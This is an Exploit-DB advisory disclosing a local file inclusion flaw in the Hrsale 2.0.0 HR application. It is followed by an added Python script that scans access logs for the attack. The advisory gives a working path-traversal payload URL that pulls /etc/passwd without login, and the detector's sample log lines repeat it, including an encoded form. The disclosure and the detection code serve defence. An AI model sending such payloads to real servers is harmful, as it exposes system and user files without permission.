Hrsale 2.0.0 – Local File Inclusion

  • Author: Sosecure
    Date: 2020-10-21
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/48920/
  • # Exploit Title: Hrsale 2.0.0 - Local File Inclusion
    # Date: 10/21/2020
    # Exploit Author: Sosecure
    # Vendor Homepage: https://hrsale.com/index.php
    # Version: version 2.0.0
    
    Description:
    This exploit allows you to download any readable file from the server without permission or a login session.
    
    Payload:
     https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd
    
    POC:
    
    1. Access the HRsale application and browse to the download path with the payload
    2. Get /etc/passwd
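
Added example (not part of the original advisory or of the Hrsale code): a log check a defender can run to find requests matching the payload above, that is, a `filename` value on the download path that climbs out of the download directory. The combined log format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); not from a real server.
SAMPLE_LOG = """\
198.51.100.7 - - [21/Oct/2020:10:01:02 +0000] "GET /download?type=files&filename=../../../../../../../../etc/passwd HTTP/1.1" 200 1843 "-" "curl/7.68.0"
203.0.113.9 - - [21/Oct/2020:10:02:10 +0000] "GET /download?type=files&filename=payslip_2020_09.pdf HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Oct/2020:10:03:44 +0000] "GET /download?type=files&filename=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1843 "-" "curl/7.68.0"
203.0.113.9 - - [21/Oct/2020:10:05:00 +0000] "GET /dashboard HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')

def is_traversal(filename):
    """True if the filename value would leave the download directory."""
    # Decode repeatedly (bounded) so nested percent-encoding is normalised.
    for _ in range(3):
        decoded = unquote(filename)
        if decoded == filename:
            break
        filename = decoded
    parts = filename.replace("\\", "/").split("/")
    return ".." in parts or filename.startswith("/")

def find_lfi_requests(log_text):
    """Return (client_ip, http_status, filename) for suspicious download requests."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        # Assumption: the application may sit under a sub-path, so match the suffix.
        if not url.path.rstrip("/").endswith("/download"):
            continue
        for value in parse_qs(url.query).get("filename", []):
            if is_traversal(value):
                hits.append((m["ip"], int(m["status"]), value))
    return hits

if __name__ == "__main__":
    for ip, status, name in find_lfi_requests(SAMPLE_LOG):
        print(f"{ip} status={status} filename={name}")
```

A hit with status 200 means the server answered the request and the named file should be treated as disclosed.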